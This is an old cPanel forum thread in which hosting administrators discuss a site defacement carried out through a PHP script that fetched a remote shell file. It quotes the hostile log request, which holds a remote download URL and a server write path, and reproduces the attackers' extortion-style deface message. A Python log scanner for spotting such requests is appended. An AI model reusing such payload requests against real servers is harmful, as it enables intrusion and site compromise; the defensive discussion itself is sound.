The Community Forums

Interact with an entire community of cPanel & WHM users!
WARNING: Downloadable Shell Exploit

Discussion in 'General Discussion' started by jackie46, Apr 19, 2006.

  1. jackie46

    One of our user websites was hacked and defaced even with the latest mod_security rules in place. It seems there is a new way to download PHP shell scripts to a user's directory and then execute them.

    195.239.108.61 www.site.com - [04/Apr/2006:12:16:38 -0400] "GET /rapidpro51.php?link=http%3A%2F%2Fwww.megaupload.com%2Fru%2F%3Fd%3DD6DOKVCP&comment=&email=&method=tc&partSize=10&proxy=&path=%2Fhome%2Fstitadd4%2Fpublic_html%2Fimages%2Fdvd HTTP/1.1" 200 12933 "http://www.site.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hotlog=1"

    It seems this command could be executed on anyone's website, which would lead to a site or entire server compromise.

    We need a mod_security rule for this one.

    They also downloaded a script called z12sh.php, which was the actual shell script executed to hack the site. Needless to say, I ran this script and was horrified at all the information it showed me about my server, not to mention that the disabled functions in php.ini (e.g. php_shell, dl, passthru etc.) did nothing to stop the execution of the script.

    V.I.P HACKER DEFACE

    -{Z12-HACKER-GROUP-IS-V.I.P. TEAM}-

    This SITE HACKED BY

    Mr. Gh0ster

    English DEFACE VERSION

    Because of the numerous insecure places on your site, it has been DEFACED.

    Safety is the most important thing on the Internet.

    For a small amount of money you can have our security support.

    For this purpose, write a letter to our e-mail.

    Visit our private site on the Internet on a regular basis!

    z12team@gmail.com

    Russian version of the DEFACE!!!

    Because of the numerous security holes in your site, it has been DEFACED!

    Security is the most important thing on the Internet.

    For a small amount of money YOU can get our HACKER 100% security support.

    For this, write a letter to our e-mail.

    Visit our private site on the Internet regularly! EVERYTHING IS THERE =)



    0 1 0 0 0 1 1 0 0 0 0 0 0 1 0 0 1 1 0 0 0 1 0 1 1 1 1 1 0 1 0 0 0 1 1 0 0 1 0 1 0 1 0 1 1 1 1 0 0 0 1 0 1 1 1 1 1 0 1 0 1 0 1 0 0 1 0 1 0 1 1 1 0 0 0 1 0 1 1 0 0 1 1 1 0 1 0 0 1 1 0 1 0 1 1 0 1 1 1 0 0 0 0 0 1 0 0 1 1 1 1 1 1 1 1 0 0 1 1 1 0 0 1 0 1 0 0 1 0 0 1 0 0 1 1 0 1 1 (C) Z12 HACKER GROUP, 2006
     
    #1 jackie46, Apr 19, 2006
    Last edited: Apr 19, 2006
  2. fleksi

    try using mod_security rules from h**p://www.gotroot.com

    -FL-
     
  3. jamesbond

    GET /rapidpro51.php?link=http://www.megaupload.com/ru/?d=D6DOKVCP&comment=&email=&method=tc&partSize=10&proxy=&path=/home/stitadd4/public_html/images/dvd HTTP/1.1" 200 12933 "http://www.site.com/rapidpro51.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hotlog=1"

    Is this site running a custom made script? If not, what software is this site running on?

    The 'hackers' included their URL using the link variable (see link=http://...), which means allow_url_fopen is not disabled on your server or for that account.

    Blocking link=http through mod_security is not an option here, I think, because that might break their script (just a guess, since I don't know what it's supposed to do).

    Blocking megaupload.com or filenames through mod_security is pointless, since they can place their scripts on thousands of locations and name them whatever they want to name them.

    You could try blocking requests for "path=/"; I don't think that will cause false positives.

    It's nearly impossible to write mod_security rules for these types of attacks without generating false positives, especially with custom-made scripts. If the script is exploitable, then it should be fixed ASAP.
     
    #3 jamesbond, Apr 20, 2006
    Last edited: Apr 20, 2006
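A log-side check for the two things jamesbond points out in the quoted request (a full remote URL in one parameter, an absolute server path in another), added here as an example and not code from the thread or from cPanel. The log-line layout (client, vhost, ident, time, request) is assumed from the line quoted above; the first sample line is that line, the second is constructed for contrast.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumed layout, matching the thread's line: client vhost ident [time] "method target proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) (?P<vhost>\S+) \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)
# Any URL scheme (http://, https://, ftp:// ...), which only matters when allow_url_fopen is on
REMOTE_URL = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def suspicious_params(target):
    """Return [(param, reason)] for query parameters carrying a remote URL (a fetch
    source) or an absolute filesystem path (a write destination), in query order."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; a second pass catches double-encoding
        if REMOTE_URL.match(value):
            findings.append((name, "remote URL"))
        elif value.startswith("/"):
            findings.append((name, "absolute path"))
    return findings


def scan_access_log(lines):
    """Return one dict per log line whose request carries a suspicious parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed layout; skip rather than guess
        found = suspicious_params(m["target"])
        if found:
            hits.append({"client": m["client"], "time": m["time"],
                         "script": urlsplit(m["target"]).path, "params": found})
    return hits


SAMPLE_LINES = [
    # the request quoted in this thread
    '195.239.108.61 www.site.com - [04/Apr/2006:12:16:38 -0400] "GET /rapidpro51.php?link=http%3A%2F%2F'
    'www.megaupload.com%2Fru%2F%3Fd%3DD6DOKVCP&comment=&email=&method=tc&partSize=10&proxy=&path=%2Fhome'
    '%2Fstitadd4%2Fpublic_html%2Fimages%2Fdvd HTTP/1.1" 200 12933 "http://www.site.com/rapidpro51.php" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "hotlog=1"',
    # constructed benign request: relative path, no URL scheme
    '10.0.0.5 www.site.com - [04/Apr/2006:12:20:01 -0400] "GET /gallery.php?path=images%2Fdvd&page=2 '
    'HTTP/1.1" 200 4410 "-" "Mozilla/5.0" "-"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LINES):
        print(hit)
```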